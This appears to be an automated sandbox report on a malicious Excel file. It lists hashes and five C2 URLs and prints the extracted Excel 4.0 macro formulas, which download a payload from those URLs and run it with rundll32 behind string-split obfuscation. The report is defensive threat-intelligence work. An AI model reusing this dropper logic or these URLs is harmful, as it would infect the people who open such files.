General

  • Target: a107ca07d780272a9259c98f7b83ec17d6d0f0cbdad109fe229ef4cffa3da1c3
  • Size: 103KB
  • Sample: 241120-r8kbksxhja
  • MD5: 3d9b82594d86797c264e045042fcef7f
  • SHA1: 03be204ccf285c7bba3f2ed1b3d8e2d8083949da
  • SHA256: a107ca07d780272a9259c98f7b83ec17d6d0f0cbdad109fe229ef4cffa3da1c3
  • SHA512: 3c5ddac31f92b49de9feff14c5ab59fadc83122fc4390e5006bf855b40f37048f436bceb60d579bb3f42cf4727adccd1d0393e28ce60d2720e014aa18c923988
  • SSDEEP: 3072:nHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:HhRYXHrbtO8eOaDPk1ox

Score: 10/10

Malware Config

Extracted

  • Rule: Excel 4.0 XLM Macro
  • C2:
    http://landorestates.com/wordpress/NELf96wr/
    https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
    http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/
    https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/
    https://csinoticias.com/wp-includes/RnHjIzg/
  • Attributes
    formulas (one extracted XLM formula per line):
    =FORMULA()
    =TODO
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://landorestates.com/wordpress/NELf96wr/","..\wlw.ocx",0,0)
    =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://csinoticias.com/wp-includes/RnHjIzg/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wlw.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

  • Language: xlm4.0
  • Source / URLs:
    xlm40.dropper  http://landorestates.com/wordpress/NELf96wr/
    xlm40.dropper  https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
    xlm40.dropper  http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/
    xlm40.dropper  https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/
    xlm40.dropper  https://csinoticias.com/wp-includes/RnHjIzg/


Targets
  • Process spawned unexpected child process

    This typically indicates the parent process was compromised via an exploit or macro.
